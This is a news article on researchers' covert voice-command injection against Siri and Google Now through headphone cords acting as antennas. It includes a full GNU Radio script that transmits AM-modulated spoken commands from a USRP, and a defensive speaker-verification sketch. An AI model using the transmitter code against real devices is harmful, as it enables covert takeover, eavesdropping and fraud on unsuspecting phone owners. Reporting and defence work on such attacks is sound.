Attackers can use Siri, Google Now to secretly take over smartphones

A team of researchers from the French Network and Information Security Agency (ANSSI) has devised a way to covertly exploit the Siri and Google Now voice-activated personal assistants to make the target's smartphone send messages and emails, visit potentially malicious sites, place pricey phone calls, or even become an eavesdropping device.

For the attack to succeed, the target device must have headphones with a built-in microphone plugged in, and the attacker must be within close range of it, though they never need physical access to the device.

The attack works like this: the headphones' cord functions as an antenna, converting electromagnetic waves transmitted by the attacker into electrical signals that the OS interprets as voice commands arriving via the microphone.

On the attacker's side, the setup consists of a laptop running GNU Radio, a USRP software-defined radio, an amplifier, and an antenna.
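To make the transmit side concrete, here is a minimal GNU Radio sketch of one plausible way to broadcast a recorded voice command: AM-modulating the audio onto a carrier so the induced signal on the headphone cord demodulates into something the phone's mic input will pass along as speech. This assumes GNU Radio 3.8+ with the UHD driver; the file name, carrier frequency, sample rate, gain, and modulation index are illustrative placeholders, not the researchers' actual parameters.

```python
from gnuradio import gr, blocks, filter, uhd

class VoiceCommandTx(gr.top_block):
    def __init__(self, wav_file="ok_google_command.wav",
                 center_freq=103.0e6, samp_rate=250e3, gain=60):
        gr.top_block.__init__(self, "voice_command_tx")

        # Looped recording of the spoken command (48 kHz mono WAV assumed)
        src = blocks.wavfile_source(wav_file, True)

        # Resample 48 kHz audio to the 250 kHz baseband rate (125/24 ratio)
        resamp = filter.rational_resampler_fff(125, 24)

        # Classic AM with carrier: (1 + m * x(t)), m = modulation index
        mod = blocks.multiply_const_ff(0.5)
        carrier = blocks.add_const_ff(1.0)
        to_iq = blocks.float_to_complex()

        # The USRP upconverts the baseband AM signal to the chosen carrier;
        # the external amplifier and antenna follow in hardware.
        sink = uhd.usrp_sink("", uhd.stream_args(cpu_format="fc32",
                                                 channels=[0]))
        sink.set_samp_rate(samp_rate)
        sink.set_center_freq(center_freq)
        sink.set_gain(gain)

        self.connect(src, resamp, mod, carrier, to_iq, sink)

if __name__ == "__main__":
    tb = VoiceCommandTx()
    tb.start()
    input("Transmitting; press Enter to stop.")
    tb.stop()
    tb.wait()
```

AM is the natural choice for such a sketch because the phone's audio front end effectively acts as the demodulator: the cord picks up the carrier, and the envelope that survives the input stage is the original voice waveform.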

The whole setup can fit into a backpack, allowing the attacker to get close enough (some six and a half feet) to the target in situations where crowds are normal (airports, public transportation, etc.). The researchers told Wired's Andy Greenberg that the attack range can be extended to around 16 feet, but that the required setup would be much, much larger, and therefore more unwieldy.

Such an attack would, of course, be noticed by targets who happen to be looking at their phone at that exact moment. The attack also works best against unlocked phones, although on newer iPhones Siri can be invoked from the lock screen, which removes that requirement.

The researchers have advised Apple and Google on how to close this particular attack vector (voice recognition, custom "wake" words for the personal assistant, better-shielded headphone cords), but have also concluded that letting anyone other than the phone's legitimate owner bypass the PIN lock with voice commands is generally a bad idea.
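The "voice recognition" fix amounts to speaker verification: only honor a wake word if the voice roughly matches the enrolled owner. As a toy illustration only (nothing like what Apple or Google would ship), the sketch below compares a crude voiceprint, the mean MFCC vector, via cosine similarity; librosa, the file names, and the threshold are all assumptions for illustration.

```python
import numpy as np
import librosa

def voiceprint(path):
    """Average MFCC vector as a crude voice fingerprint."""
    audio, sr = librosa.load(path, sr=16000)
    mfcc = librosa.feature.mfcc(y=audio, sr=sr, n_mfcc=20)
    return mfcc.mean(axis=1)

def same_speaker(enrolled_wav, incoming_wav, threshold=0.9):
    """Accept only if the incoming voice resembles the enrolled owner's."""
    a, b = voiceprint(enrolled_wav), voiceprint(incoming_wav)
    cos = np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b))
    return cos >= threshold

# Silently injected commands would come through in the attacker's recorded
# voice, so a speaker check like this would reject them at the wake word.
if not same_speaker("owner_enrollment.wav", "incoming_command.wav"):
    print("Wake word ignored: speaker does not match enrolled owner.")
```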
